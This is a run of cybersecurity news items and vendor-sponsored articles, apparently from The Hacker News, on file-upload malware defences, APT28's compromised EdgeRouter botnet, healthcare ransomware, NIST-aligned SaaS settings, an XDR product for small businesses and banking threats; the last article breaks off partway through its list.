Mar 13, 2024The Hacker NewsApp Security / Cyber Security

One of the most common misconceptions in file upload cybersecurity is that certain tools are “enough” on their own—this is simply not the case. In our latest whitepaper OPSWAT CEO and Founder, Benny Czarny, takes a comprehensive look at what it takes to prevent malware threats in today’s ever-evolving file upload security landscape, and a big part of that is understanding where the pitfalls are, and how to avoid them.

The first step in that process is understanding that three commonly used tools or solutions are not enough on their own. Let’s explore this concept and take a closer look at a better solution.

Understanding the Challenge

Modern web applications are complex, utilizing internet-connected IT systems that interface with critical OT systems, as well as leveraging a wide range of cloud providers and protocols. All these systems transfer and store highly sensitive and valuable data across government, healthcare, power, financial, and other critical sectors the world over, carrying with them threats capable of causing severe damage.

Securing file uploads to detect and prevent malware infiltration is critical. As this threat vector grows and the attack surface spreads, ensuring that these sectors remain secure becomes of the utmost importance. This is why building—and enforcing—a reliable and proven security strategy is paramount moving forward.

Tools of the Trade

One tool on its own is simply not enough. Here are three commonly used tools that, when used on their own to secure file uploads, do not offer adequate protection and why that is the case:

1. Anti-Malware File Scanning

Everyone is familiar with anti-malware, but not all anti-malware engines—or scanning modes—are created equal. It’s intriguing that there is still so much confusion over the efficacy rates when it comes to the “always-on” real-time protection that’s monitoring an entire system versus, say, static file scanning strategies that need to be run manually or scheduled. Real-time scanning can exhibit nearly 100% efficacy rates, while in contrast, static scanning is noticeably lower with rates that range between 6-76%. To avoid a false sense of security, organizations must know exactly what they are getting with each deployment mode.

2. Web Application Firewalls

Many experts believe that by installing a web application firewall (WAF) they are protected against malicious file uploads. The reality is that it is very much not the case, as web application firewalls primarily protect against attacks at the application layer (OSI Layer 7). They do not have a specific design to prevent malware infections that may target other layers or spread through different channels, such as email attachments or removable media. Additionally, they struggle with encrypted traffic (like https) and typically rely on a single anti-malware solution for threat detection.

3. Sandboxing

Sandboxing is a technique that was originally used to analyze malware by isolating and executing suspicious files in a controlled environment to understand their behavior and detect potential signs of malware. Alone, sandboxes face limitations such as weakness to advanced and time-based evasion techniques that obfuscate or delay malicious activities and environment-specific triggers in adaptive malware. They are resource-intensive, prone to false positives and negatives, and offer limited coverage specific to file-based malware.

Defense-in-Depth Cybersecurity

So, if you can’t rely on these methods alone, what is the answer? This is one of the spaces OPSWAT has spent the last 20 years innovating in. Our MetaDefender Platform layers in market-leading and globally trusted technologies to form an easy to deploy, integrated-by-design, defense-in-depth cybersecurity strategy for securing file uploads.

Multiscanning: Utilize over 30 of the world’s best antivirus engines to detect nearly 100% of threats

Multiscanning

As the effectiveness of single anti-malware solutions for static analysis varies anywhere from 6% to 76%, we decided to integrate multiple commercially available ones into our solution and benefit from their combined power. With more than 30 leading anti-malware engines working simultaneously, our efficacy rates are just shy of 100% while being optimized for speed.

Deep Content Disarm and Reconstruction: Sanitize, block, and remove file objects and regenerate a safe copy

Deep Content Disarm and Reconstruction (Deep CDR)

To further bolster our defenses, we pioneered a unique methodology, referred to as Deep Content Disarm and Reconstruction (Deep CDR). Awarded a AAA, 100% Protection rating from SE Labs, our unique technology provides comprehensive prevention-based security for file uploads by neutralizing potential threats before they can cause harm. It evaluates and verifies the file type and consistency and validates file extensions to prevent masquerading and alerts organizations if they are under attack. Then it separates files into discrete components and removes potentially harmful objects and rebuilds usable files, reconstructing metadata, preserving all file characteristics.

Proactive Data Loss Prevention: Reduce alert fatigue by redacting sensitive data

Proactive Data Loss Prevention (Proactive DLP)

OPSWAT’s Proactive Data Loss Prevention (DLP) module was developed specifically to address the growing concerns of compliance and regulation, data leakage and risks associated with file uploads. Our solution detects and protects sensitive information within various file types, including text, image, and video-based patterns.

Adaptive Sandbox: Adaptive threat analysis technology enables zero-day malware detection and extracts more indicators of compromise.

Real-Time Adaptive Sandbox

To overcome the limitations of traditional sandboxing, OPSWAT developed a unique emulation-based sandbox with adaptive threat analysis. By pairing it with our Multiscanning and Deep CDR technologies it provides a comprehensive multi-layered approach to malware detection and prevention. Our emulation-based approach can swiftly de-obfuscate and dissect even the most complex, state-of-the-art, and environment-aware malware in under 15 seconds.

What’s Next?

These are only some of the technologies that power the MetaDefender Platform. Like the modules detailed in this article, there are more that are purpose-built to meet the varied use-cases and needs of critical infrastructure protection. Like the threat landscape around us, we are driving innovation forward to step up and stay ahead of the latest threats.

We encourage you to read the whole whitepaper here, and when you’re ready to discover why OPSWAT is the critical advantage in file upload cybersecurity, talk to one of our experts for a free demo.

Feb 28, 2024NewsroomFirmware Security / Vulnerability

In a new joint advisory, cybersecurity and intelligence agencies from the U.S. and other countries are urging users of Ubiquiti EdgeRouter to take protective measures, weeks after a botnet comprising infected routers was felled by law enforcement as part of an operation codenamed Dying Ember.

The botnet, named MooBot, is said to have been used by a Russia-linked threat actor known as APT28 to facilitate covert cyber operations and drop custom malware for follow-on exploitation. APT28, affiliated with Russia’s Main Directorate of the General Staff (GRU), is known to be active since at least 2007.

APT28 actors have “used compromised EdgeRouters globally to harvest credentials, collect NTLMv2 digests, proxy network traffic, and host spear-phishing landing pages and custom tools,” the authorities said [PDF].

The adversary’s use of EdgeRouters dates back to 2022, with the attacks targeting aerospace and defense, education, energy and utilities, governments, hospitality, manufacturing, oil and gas, retail, technology, and transportation sectors in the Czech Republic, Italy, Lithuania, Jordan, Montenegro, Poland, Slovakia, Turkey, Ukraine, the U.A.E., and the U.S.

MooBot attacks entail targeting routers with default or weak credentials to deploy OpenSSH trojans, with APT28 acquiring this access to deliver bash script and other ELF binaries to collect credentials, proxy network traffic, host phishing pages, and other tooling.

This includes Python scripts to upload account credentials belonging to specifically targeted webmail users, which are collected via cross-site scripting and browser-in-the-browser (BitB) spear-phishing campaigns.

APT28 has also been linked to the exploitation of CVE-2023-23397 (CVSS score: 9.8), a now-patched critical privilege escalation flaw in Microsoft Outlook that could enable the theft of NT LAN Manager (NTLM) hashes and mount a relay attack without requiring any user interaction.

Another tool in its malware arsenal is MASEPIE, a Python backdoor capable of executing arbitrary commands on victim machines utilizing compromised Ubiquiti EdgeRouters as command-and-control (C2) infrastructure.

“With root access to compromised Ubiquiti EdgeRouters, APT28 actors have unfettered access to Linux-based operating systems to install tooling and to obfuscate their identity while conducting malicious campaigns,” the agencies noted.

Organizations are recommended to perform a hardware factory reset of the routers to flush file systems of malicious files, upgrade to the latest firmware version, change default credentials, and implement firewall rules to prevent exposure of remote management services.

The revelations are a sign that nation-state hackers are increasingly using routers as a launchpad for attacks, using them to create botnets such as VPNFilter, Cyclops Blink, and KV-botnet and conduct their malicious activities.

The bulletin arrives a day after the Five Eyes nations called out APT29 – the threat group affiliated with Russia’s Foreign Intelligence Service (SVR) and the entity behind the attacks on SolarWinds, Microsoft, and HPE – for employing service accounts and dormant accounts to access cloud environments at target organizations.

On Thanksgiving Day 2023, while many Americans were celebrating, hospitals across the U.S. were doing quite the opposite. Systems were failing. Ambulances were diverted. Care was impaired. Hospitals in three states were hit by a ransomware attack, and in that moment, the real-world repercussions came to light—it wasn’t just computer networks that were brought to a halt, but actual patient care itself.

Cybercriminals are more brazen than ever, targeting smaller healthcare organizations for big payouts. Sure, it would be nice to believe thieves once lived by a code of conduct, but if one ever existed, it’s been torn to shreds and tossed into the wind. Sophisticated hacker groups are now more than happy to launch cyberattacks on medical clinics, nursing homes, and other health service providers. Small- to mid-sized healthcare organizations have, unfortunately, become vulnerable targets from which cybercriminals can easily steal sensitive data, extort heavy ransoms, and, worst of all, diminish critical patient care.

Ransomware and Phishing Attacks are Spreading at an Unhealthy Rate

If you work in healthcare, everything you do is important. That’s why the frequency by which healthcare organizations now come under attack is so concerning. According to the U.S. Department of Health and Human Services (HHS), there’s been a 93% increase in large breaches from 2018 to 2022. In that same period, there’s been a 278% increase in breaches involving ransomware.

Ransomware doesn’t just hold your pocketbook hostage, but also your patients’ safety. At best, you’re locked out of your systems for a moment. At worst, patient care is radically compromised. This is especially alarming if you service smaller communities, where the local population relies on your clinic, cancer center, or physician’s office as the first and last lines of critical care.

Your patients are obviously your top priority, but you also have to consider the dollars at stake. The HIPAA Journal notes that in 2021, the average ransomware payment in the healthcare industry was $197,000. And that’s an increase of 33% from the prior year!

Phishing—fraudulent emails disguised as legitimate sources attempting to solicit personal information—is now the most popular means of attack. In fact, The HIPAA Journal cites that more than 90% of cyberattacks on healthcare organizations are phishing scams. That means carelessly clicking on one email can have dire consequences for your staff, your patients, and your operation.

Aside from the potential financial burden inflicted by cybercriminals, Health Insurance Portability and Accountability Act (HIPAA) fines can also be debilitating. If you fall prey to data breaches, you can potentially be fined tens of thousands of dollars per violation. Case in point, a medical group in Louisiana recently paid a staggering fine of $480,000, settling the first-ever cyberattack investigation conducted by HHS’ Office for Civil Rights. This was all the result of a basic phishing scam where a cybercriminal gained access to the medical group’s Microsoft 365 environment, the storage point for their patients’ protected health information (PHI).

More Endpoints and Fewer Resources Make Healthcare Easier Targets

Simply put, effective cybersecurity needs both advanced technology and human expertise. However, according to the report, The State of Cybersecurity for Mid-Sized Businesses in 2023, Huntress discovered over 60% of respondents didn’t have any dedicated cybersecurity experts on staff. That’s because many small- and mid-sized businesses (SMBs) are constrained, struggling to attain just one of these core components. Due to a variety of economic factors, SMBs—both within and beyond healthcare—have had to reduce budgets, which means foregoing much-needed investments in cybersecurity products and people.

According to the Healthcare Information and Management Systems Society (HIMSS), healthcare organizations typically spend less than 6% of their overall IT budgets on cybersecurity. Making matters worse, there’s a profound shortage of cybersecurity talent, so filling internal roles with qualified candidates has become a rising challenge. And with top talent being few and far between, the best candidates are commanding top-level salaries, which at times are out of reach for smaller healthcare organizations.

Aging tech isn’t helping matters either. Outdated equipment and legacy operating systems have become easy points of access for cybercriminals. Therefore, smaller healthcare organizations are ideal targets due to weaker defenses. With limited budgets and less manpower, your IT team may be stretched thin or may not possess the cybersecurity expertise to manage evolving cyber threats.

Adding to the chaos, there are more endpoints to protect than ever before. Over the past decade, most notably throughout COVID, remote work and telehealth have grown significantly. The good news is patients can now receive care from the comfort of their own homes, and providers like you can monitor and assist them from off-site. However, this level of care demands more avenues to access data, specifically via tablets, laptops, and mobile devices. Conversely, this also means there are now more attack surfaces for unscrupulous actors to access your data.

The Threat Landscape is Evolving, for the Worse

One reason threats are becoming more frequent is because cybercriminals are becoming more organized. And more ruthless. It’s no longer a mischievous loner in a dark basement, hunched over a monitor, hiding behind a black hoodie. These are sophisticated criminal entities that can carry out carefully choreographed heists. Imagine Ocean’s Eleven, but with less style and far less remorse.

U.S. intelligence has even uncovered hacking groups tied to hostile nations. Also known as advanced persistent threats (APTs), these state-sponsored cybercriminals have the means to debilitate everything from water-treatment plants to natural gas pipelines to electric grids. If these groups have grown powerful enough to take out military and civilian infrastructure, your small- to mid-sized healthcare organization is no challenge. For them, you’re just a drive-by ATM.

In the Huntress report, The State of Cybersecurity for Mid-Sized Businesses in 2023, it was revealed that nearly 25% of SMBs have either suffered a cyberattack or didn’t even realize they had suffered one in the past year.

Cybercriminals are now hiding in plain sight. They’ve advanced beyond the point of standard ransomware tactics, and they’re “blending into” your normal IT operations to exploit built-in system functionalities. This makes it easier for them to gain control over legitimate applications, such as remote monitoring and management (RMM), to manipulate your systems. For instance, cybercriminals can use living-off-the-land binaries (LOLBins)—trusted executables pre-installed on your operating systems—and exploit them for malicious intent. If these threat actors are no longer just relying on custom malware, then your standard spam filters or anti-malware solutions just aren’t enough. Therefore, you need visibility into your entire security system.

You Can Take Action Now with a Few Solutions

When it comes to healthcare cybersecurity, there’s a lot on the line—including lives—so it’s important that organizations like yours are vigilant and proactive. Because no single layer of your security is completely safe anymore, you must adopt a defense-in-depth approach.

This entails creating layers to your defenses with solutions such as intrusion prevention, data encryption, threat detection, patch management, and more. So if a threat bypasses one of these countermeasures, there’s another layer to stop it from slipping through the cracks. A layered approach, however, likely requires ongoing monitoring and fine-tuning. If you happen to lack the in-house resources and expertise to manage your cybersecurity, rest assured there are a variety of simple solutions you can still implement to achieve effective protection, with one of the most potent being a managed EDR.

Security Awareness Training (SAT)

Introduce SAT to educate your staff on cybersecurity best practices. These programs can include phishing simulations and relevant cyber threat lessons that can guide them to make smarter decisions to keep your organization and your patients safe. When it comes to SAT programs, it’s advised you introduce engaging, story-driven lessons, as those are proven to be more effective for knowledge retention.

Multi-Factor Authentication (MFA)

MFA adds an extra layer of protection by requiring your staff to use a second verification factor, such as a personal phone or a security token, to gain access to an account. You’ve likely seen MFA used when logging into your banking app or even your go-to streaming service. The benefit of MFA is it goes beyond usernames and passwords, which can easily be lost, forgotten, or stolen.

Managed EDR

This can be the most powerful and cost-effective solution for your healthcare organization. By coupling advanced technology with human-led analysis, a managed EDR performs critical cybersecurity tasks on your behalf, namely:

• Monitoring and collecting endpoint data
• Detecting and investigating threats
• Triaging alerts
• Providing actionable remediation steps, including one-click solutions

Easy to deploy, Huntress Managed EDR is fully managed and monitored by a 24/7 Security Operations Center. These cybersecurity experts have your back from the first signs of suspicious activity all the way to remediation.

Huntress Safeguards Healthcare’s Cybersecurity Needs

As healthcare organizations sit in the crosshairs of cybercriminals, it’s absolutely vital you keep your defenses up. This is especially important in a world marked by ever-expanding threats and shrinking budgets.

Cybercriminals are now smarter, more coordinated, and definitely more unforgiving. They don’t care who they hurt, just so long as they can turn a quick profit. Therefore, it’s critical you bolster your cybersecurity in order to protect your organization, your staff, and your patients.

Building a thorough defense infrastructure, however, requires sizable capital, resources, and expertise. While smaller healthcare organizations can find it difficult to prioritize these, there are solutions. Evaluate potential risks. Educate your staff on cyber threats. And adopt a managed EDR. Just like in medicine, even the most basic preventive measures can stop the spread of something far more harmful.

Schedule a Trial Today

Huntress can help healthcare organizations like yours remain secure from ever-evolving cybersecurity threats. Schedule your free trial today.

Attending HIMSS 2024?

In Orlando, from March 11 to 15, you can visit Huntress in Booth 1616. Come learn more about how Huntress can help your healthcare organization thwart cyberattacks.

The US National Institute of Standards and Technology (NIST) cybersecurity framework is one of the world’s most important guidelines for securing networks. It can be applied to any number of applications, including SaaS.

One of the challenges facing those tasked with securing SaaS applications is the different settings found in each application. It makes it difficult to develop a configuration policy that will apply to an HR app that manages employees, a marketing app that manages content, and an R&D app that manages software versions, all while aligning with NIST compliance standards.

However, there are several settings that can be applied to nearly every app in the SaaS stack. In this article, we’ll explore some universal configurations, explain why they are important, and guide you in setting them in a way that improves your SaaS apps’ security posture.

Start with Admins

Role-based access control (RBAC) is a key to NIST adherence and should be applied to every SaaS app. There are two types of permissions within a SaaS application. Functional access covers things like creating accounts and navigating the application. Data access permissions, on the other hand, govern which users can retrieve and modify data. The admin account (or the super-admin account in some apps) is the most sensitive within the app, as it has full access to both types of permissions.

For threat actors, breaching an admin account is akin to winning the lottery. They have access to everything. Organizations must do everything within their power to maintain control over these accounts. This control is managed through configurations and best practices.

Implement Limited Redundancy

It’s important to have a minimum of two admins for every application. This redundancy makes it difficult for an admin to act alone against the best interests of the organization, as admins can monitor each other for any signs of a breach.

However, each admin increases the application’s attack surface. Organizations must strike a balance between having enough admins to adequately service the application while limiting exposure. An automated review of the number of admins should trigger alerts when the number of admins is outside the preferred range.

Eliminate External Admins

External admins introduce a new layer of uncertainty into SaaS security. Because they sit outside the organization, the security team can’t control the password policies or authentication tools that they use.

For example, should a threat actor try to log into your application and click Forgot Password, there is no way to know whether the threat actor can breach the external admin’s email account. That lack of oversight of external users could lead to a deep breach of your SaaS application, which is why NIST advises against having external admins. Depending on the application, either block external admins from getting admin privileges or identify external users with admin rights and remove those privileges.

For companies that hire an external IT company or outsource to MSSPs, those individuals should not be considered external. However, they should continue to monitor for other external users being given admin permissions.

Require Admin MFA

To comply with NIST standards, all admin user accounts should be required to access the application using multi-factor authentication (MFA), such as a one-time password (OTP). MFA requires users to present a minimum of two forms of ID before it authenticates the user. A threat actor would need to compromise two authentication systems, increasing the level of difficulty of the compromise and reducing the risk to the account. Make sure to set MFA for admins as required (we also recommend MFA for all users, but it is a must-have for admins).

Download this checklist and learn how to align your SaaS security with NIST

Prevent Data Leaks

SaaS data leaks pose significant risks to organizations and their users, potentially compromising sensitive information stored within cloud-based applications. SaaS applications are marketed as collaboration tools. However, the configurations that enable users to work together can also compromise files and data. NIST, for its part, advocates monitoring the permissions of every resource.

A visible calendar can expose employees to socially engineered phishing attacks, while shared repositories can lead to a company’s internal source code being shared publicly. Email, files, and boards all contain sensitive data that should not be accessible to the public. While the following configurations are often called something different in each application, almost any app that stores content will have this type of control.

Stop Public Sharing

The difference between Share with All and Share with a User is profound. When items are shared with all, anyone with a link can access the materials. Share with a User, in contrast, adds an additional authentication mechanism, as the user needs to log in before accessing the material.

To reduce the content that is exposed, app admins should disable sharing over public URLs (“Anyone with the link”). In addition, some applications allow users to revoke access to URLs that have already been created. When available, organizations should be sure to toggle that setting to on.

Set Invitations to Expire

Many applications allow authorized users to invite external users to the application. However, most applications don’t implement an invite expiration date. In those circumstances, invites sent years prior can provide access to a threat actor who has just breached an external user’s email account. Enabling an auto-expiration date on invites eliminates that type of risk.

It’s worth noting that in some apps, configuration changes are retroactive, while others will only take effect moving forward.

Align your SaaS Security with NIST standards – download the full guide

Strengthening Passwords to Harden Application Security

Passwords are the first line of defense against unauthorized access. NIST advocates for a strong and well-managed password policy, which is essential to protect sensitive user data, confidential business information, and proprietary assets stored within the cloud-based infrastructure. The uniqueness, complexity, and regular updating of passwords are critical aspects of a robust security posture.

Passwords serve as a fundamental element in a layered security approach, complementing other security measures such as multi-factor authentication (MFA) and encryption. Compromised passwords can be a gateway for malicious actors to exploit vulnerabilities in the SaaS environment. The effective management of passwords enhances the overall resilience of SaaS systems, contributing to a more secure and trustworthy digital ecosystem for both businesses and their users.

Prevent Password Spray Attacks

In a spray attack, threat actors enter a username and common password terms, hoping to get lucky and access the application. Requiring MFA is the recommended way to prevent password spray attacks. For those that don’t insist on employees using MFA as part of the authentication process, many apps allow organizations to ban words from being used as passwords. This list of words would include terms like password1, letmein, 12345, and the names of local sports teams. Additionally, it would include terms like the user’s name, company products, partners, and other business terms.

Going into the configurations and adding a custom banned words list can significantly reduce the risk of a successful password spray attack.

Password Complexity

Most SaaS applications allow the organization to customize password complexity. These range from allowing any password to requiring alphanumeric characters, capital and lowercase letters, symbols, or a password length. Update the password requirements in the app to match your organization’s policy.

If your organization doesn’t have a password policy, consider following NIST guidelines:

1. Don’t make mandatory password changes, as users tend to choose easy-to-remember passwords.
2. Use long passwords over complex ones. Combinations of numbers, special characters and lower/upper case characters usually follow a format like this: Password1!. These are easy to brute force. A long password like MyFavoriteDessertIsPecanPie is easy to remember but with 27 characters, difficult to brute force.
3. Limit password attempts to no more than 10.
4. Screen passwords against published passwords and other easy to guess words with a banned words list.

Configurations Really Matter

Approximately 25% of all cloud-related security incidents start with a misconfigured setting. In addition to those mentioned here relating to access, password, and data leaks, which are fairly universal, configurations are used for key management, mobile security, operational resilience, phishing protection, SPAM protection, and more. Misconfigurations in any of those areas can lead directly to breaches.

It may seem unlikely that threat actors spend their time looking for misconfiguration that they can exploit. Yet, that is exactly what the Russian state-sponsored group Midnight Blizzard did when it breached Microsoft this year. If misconfigurations can happen at Microsoft, it’s worth reviewing to make sure that your applications are all secure.

See how you can apply NIST standards to your SaaS stack

With breaches making the headlines on an almost weekly basis, the cybersecurity challenges we face are becoming visible not only to large enterprises, who have built security capabilities over the years, but also to small to medium businesses and the broader public. While this is creating greater awareness among smaller businesses of the need to improve their security posture, SMBs are often left facing a gap in the market, unable to find security tooling that is both easy for them to use and which they can afford.

When we consider the needs of SMBs, we need to focus both on the development of threat intelligence, which is necessary to understand and identify the threats being faced, as well as the tools used to provide protection. NTTSH has built a pedigree of over 20 years’ experience in the research and curation of threat intelligence as well as the development of capabilities and products which leverage its threat intelligence to protect customers. After many years of focus on larger enterprises, NTTSH is moving to democratize cybersecurity and provide smaller businesses with the protection they require.

Global Threat Intelligence Center

All of NTTSH’s efforts are underpinned by the capabilities of its Global Threat Intelligence Center (GTIC). The efforts of the GTIC go beyond those of a pure research organization by taking threat research and combining it with NTTSH proprietary detective technology to produce applied threat intelligence.

The GTIC’s mission is to protect clients by providing advanced threat research and security intelligence, enabling NTTSH to prevent, detect, and respond to cyber threats. To provide a truly unique vantage point within NTTSH’s products and services, GTIC leverages proprietary intelligence capabilities and NTT’s position as the operator of one of the world’s top 5 tier 1 Internet backbones, providing unequaled visibility of Internet telemetry to gain an understanding of and insight into the various threat actors, exploit tools and malware – and the tactics, techniques, and procedures used by attackers. In addition to curating its own threat intelligence research, GTIC also maintains relationships with other key players in this space, including the Cyber Threat Alliance, Microsoft, CISA, and the National Cyber Forensics and Training Alliance (NCFTA).

NTTSH’s annual Global Threat Intelligence Report (GTIR) provides a window into the work done by GTIC, providing a synopsis of the key challenges in the security landscape facing organizations of all sizes, together with actionable insights to help organizations better adapt to the evolving threat landscape. In the Q3 update of the 2023 GTIR, a special focus was placed on key industry verticals, providing insights into the threats they face.

Threat focus by sector

The healthcare sector faces a unique set of challenges, not only due to the high value of the information owned by healthcare providers but also as a result of steep growth in the adoption of technology in healthcare in a context where many providers, especially smaller ones, lack awareness of cybersecurity and also don’t have the resources to deploy and maintain the kinds of controls enjoyed by large enterprises. Ransomware is still proving particularly problematic. Healthcare ransomware breaches are proving to be particularly concentrated across a few geographies, with the USA, Australia, and the UK accounting for close to 80% of these breaches.

Figure 1: Ransomware victim locations in the Healthcare sector.

A similar geographic trend is visible in the telecommunications sector, where the USA, UK, and Australia account for roughly 52% of ransomware attacks, while in education, the USA, UK, and Canada account for approximately 83%.

Across all of the focus sectors, Lockbit 3.0 remains the most prolific ransomware threat actor. Some ransomware actors are, however, focusing on specific sectors, such as the Bl00dy ransomware gang, which specifically targets education.

Figure 2: Top ransomware actors in the telecommunications sector

Security Challenges of SaaS

A recent area of focus for GTIC has been the way in which the rapidly accelerating adoption of SaaS is presenting its own set of challenges. SaaS is rapidly becoming an integral part of the day-to-day operations of both small and large businesses, with annual growth expected to continue at a rate of close to 20% through 2027. In this context, it is important to note that 99% of cloud security breaches are expected to be the customer’s fault, according to Gartner.

The shared responsibility model for cloud services has been something that larger enterprises have been familiar with for some time already. Smaller organizations are, however, still coming to grips with this model. In respect of SaaS, this means that while the cloud provider is responsible for the application, SMBs are still adapting to the fact that they retain responsibility for their data and, crucially, manage their accounts and identities. Threat actors are, as a result, focusing on ways to compromise identities, especially using techniques such as credential stuffing and phishing.

Facing up to the Challenges of Hybrid IT

While SMBs were previously able to rely on antivirus software and firewalls to protect the technology assets on their premises, most have now moved into the world of hybrid IT as they increasingly rely on cloud-delivered services. While the security controls provided by most cloud services are good, SMBs face a variety of challenges in using the security functionality that is available to them.

As the attack surface of even smaller companies expands, the number of sources of security alerting grows. That is not the only challenge: threat actors will often not confine their activities to one part of your technology estate. They may start in one area, for instance, by compromising one or more endpoints (such as laptops) and then use the information they gather (such as credentials) to move laterally, for instance, to compromise a SaaS application. While large enterprises have spent the last 10 years or more building dedicated SecOps teams and intricate security toolchains, SMBs lack the resources for this kind of investment.

Democratizing Security Operations with XDR

What SMBs need is the ability to bring alerting from all of their IT infrastructure and applications into a single tool, which can analyze all of an organization’s telemetry, apply threat intelligence, and then provide a simple interface that acts as a single pane of glass for managing alerting, performing investigations and responding to threats. This is where XDR provides a solution that combines the key components of a traditional SecOps toolchain in a single cloud-hosted application, which can be delivered affordably. This is the second key area where NTTSH has turned its focus towards SMBs by focusing the development of its Samurai XDR product on the needs and budgets of SMBs while still delivering the functionality that large enterprises have become accustomed to. While GTIC’s research provides the intelligence needed to understand and detect the threats facing modern organizations, Samurai XDR makes GTIC’s work accessible and actionable even for organizations that lack dedicated SecOps resources. It is crucial to remember that while threat intelligence is essential to be able to detect threats, every organization needs tools in order to apply it.

A brief journey through Samurai XDR

From the start, Samurai XDR is designed to be easy to use and, most importantly, to be accessible to all IT staff, not only to security analysts. The starting point of all workflows in Samurai XDR is the alerts dashboard. This is where the system presents security alerts which have been prioritized based on severity and confidence.

Figure 3: Samurai XDR Alerts Dashboard

The alerts dashboard brings together alerts from all of the technologies used by the organization into a single prioritized view, with a focus on providing an intuitive interface that can be used by most IT staff, not only by specialist security analysts.

Once the user has decided that an alert warrants further investigation, the Investigations view provides a similarly simple and intuitive interface for managing the lifecycle of an investigation of a potential security incident.

Once events and alerts are processed, they are stored in Samurai XDR’s data lake. The data lake provides the ability for users to query and analyze all of the events ingested into Samurai XDR, going back up to one full year. This makes it possible to interrogate a full year’s historical data for purposes such as threat hunting – allowing Samurai XDR users to perform detailed analyses of historical events for any signs of threats that may have been dwelling for longer periods of time. Querying the events in the data lake is made possible by Samurai XDR’s Advanced Query function, which allows users to search the data lake both graphically and using Microsoft’s Kusto Query Language (KQL).

Integrations

Integrations provide the mechanism to ingest telemetry (such as logs) from your IT infrastructure and applications into Samurai XDR. NTTSH has focused on bringing together the right mix of capabilities to ingest telemetry from both on-premises infrastructure and cloud services, mirroring the kind of hybrid IT environment that has become typical for even most SMBs today. Some examples of integrations currently available include:

• Cloud: Azure Management Plane and Microsoft 365 (coming soon), Google Workspace (coming soon)
• Endpoint Detection and Response: Microsoft Defender for Endpoint, VMWare Carbon Black and Crowdstrike Falcon Insight
• Next-Generation Firewalls: Cisco Secure Firewall (ASA and Firepower Threat Defense), Fortinet Fortigate, and Palo Alto Networks NGFW.

Over the coming months, NTTSH will be busy adding more integrations, including but not limited to Meraki, Bitdefender, Sophos, Zoom, MalwareBytes, OneLogin, OKTA, Zscaler, AWS, and many more!

Making it Easy

A key area of focus for NTTSH in the development of Samurai XDR has been that of making it easy to use and easy to afford. For example, the configuration of integrations is supported by simple “point and click” workflows. For infrastructure that provides logs via syslog, all that is needed is to point the log source at Samurai XDR’s secure syslog collector, and Samurai XDR will do the work of detecting the kind of device that is sending logs. Naturally, it’s the same for cloud integrations. Samurai XDR keeps the steps to a minimum and guides the user through interactive steps and access to knowledge-base articles.

Samurai XDR also follows a simple pricing model – based solely on the number of endpoints that the customer has, removing the need to try to estimate the data volumes of the telemetry that will be ingested into the platform. Standard pricing for 50 endpoints or more is only $3.33 per endpoint per month, and for smaller customers, there is a Starter Pack for up to 25 endpoints, which is priced at $750 for a year.

To make it easy to try out Samurai XDR, NTTSH is providing all new customers with a free 30-day trial, making it possible to experience all of its functionality without any commitments, giving even the smallest SMBs a risk-free route to building an advanced SecOps capability.

The landscape of cybersecurity in financial services is undergoing a rapid transformation. Cybercriminals are exploiting advanced technologies and methodologies, making traditional security measures obsolete. The challenges are compounded for community banks that must safeguard sensitive financial data against the same level of sophisticated threats as larger institutions, but often with more limited resources.

The FinServ Threat Landscape

Recent trends show an alarming increase in sophisticated cyber-attacks. Cybercriminals now deploy advanced techniques like deep fake technology and AI-powered attacks, making it increasingly difficult for banks to differentiate between legitimate and malicious activities. These developments necessitate a shift towards more sophisticated and adaptive cybersecurity measures. Take these industry statistics, for example.

• Financial firms report 703 cyberattack attempts per week.1
• On average, 270 attacks (entailing unauthorized access of data, applications, networks, or devices) occurred in financial services, an increase of 31% compared with the prior year.2
• On average, financial services businesses take an average of 233 days to detect and contain a data breach.3
• 43% of senior bank executives don’t believe their bank is adequately equipped to protect customer data, privacy, and assets in the event of a cyberattack.4
• The average data breach cost in financial services is $5.72 million per incident.5

State-sponsored cyberattacks also pose a unique threat to the financial sector. These attacks are often highly sophisticated and well-funded, aimed at destabilizing financial systems or stealing sensitive economic information. Community banks must be prepared to defend against these high-level threats, which require a different approach than conventional cybercriminal activities.

Similarly, in recent times, there has been a concerning trend where major service providers catering to small-medium-sized banks, such as FIS, Fiserv, and Jack Henry, have become prime targets for cyber-attacks. Targeting these service providers allows threat actors to widen their net and make their attempts more efficient, as compromising a single service provider can potentially provide access to multiple small banks. This underscores the critical importance of strong vendor management governance. Community banks must be prepared to defend against these high-level threats, which require a different approach than conventional cybercriminal activities.

Proactive measures can be taken to overcome the threats facing the FinServ industry. Companies like ArmorPoint provide complimentary Cybersecurity Workshops where they have seasoned cybersecurity experts identify specific security gaps and produce recommendations to mitigate those risks.

Top 5 FinServ Cybersecurity Challenges and How to Overcome Them

1. Advanced Cloud Security Strategies

Cloud computing, with its numerous benefits of scalability, flexibility, and cost-effectiveness, is increasingly being adopted by financial institutions. However, this shift introduces specific security concerns that can be challenging to manage. The complexity of cloud security stems from the need to protect data across diverse and dynamic environments. In the cloud, data often moves across various services and geographies, making traditional perimeter-based security approaches less effective. Additionally, the shared responsibility model in cloud computing can lead to ambiguity in security roles and responsibilities between the cloud service provider and the bank.

To address these challenges, banks must adopt advanced cloud security strategies. This involves implementing comprehensive data encryption to protect data at rest and in transit, and robust identity and access management systems to control who can access what data and under what conditions. Zero-trust security models, where trust is never assumed and verification is required from everyone trying to access resources in the network, are increasingly vital. Understanding the nuances of different cloud environments—public, private, and hybrid—is also key to tailoring security measures effectively.

2. Ransomware: Beyond Basic Defense

Ransomware attacks in the financial sector have become increasingly sophisticated, leveraging tactics like “Ransomware as a Service” (RaaS) to target institutions. The evolving nature of ransomware, combined with the high value of financial data, makes these institutions particularly vulnerable. Traditional defense strategies are often inadequate in the face of such advanced threats, which can bypass standard security measures and encrypt critical data, causing operational disruptions and financial losses.

Banks need to implement a multi-layered defense strategy against ransomware. This includes advanced threat intelligence systems that can provide real-time insights into emerging threats and vulnerabilities. Regular security audits are crucial to identify and address potential vulnerabilities in the bank’s cybersecurity infrastructure. Additionally, proactive threat hunting teams can play a critical role in identifying and neutralizing threats before they materialize, providing an additional layer of defense against ransomware attacks.

3. Comprehensive Vendor Risk Management

Financial institutions increasingly rely on third-party vendors for a range of services, from cloud computing to customer relationship management. Each vendor relationship introduces potential cybersecurity risks, as vendors may have access to or manage sensitive bank data. Managing these risks is complicated by the differing security postures and practices of various vendors, making it challenging to ensure consistent security standards across all third-party relationships.

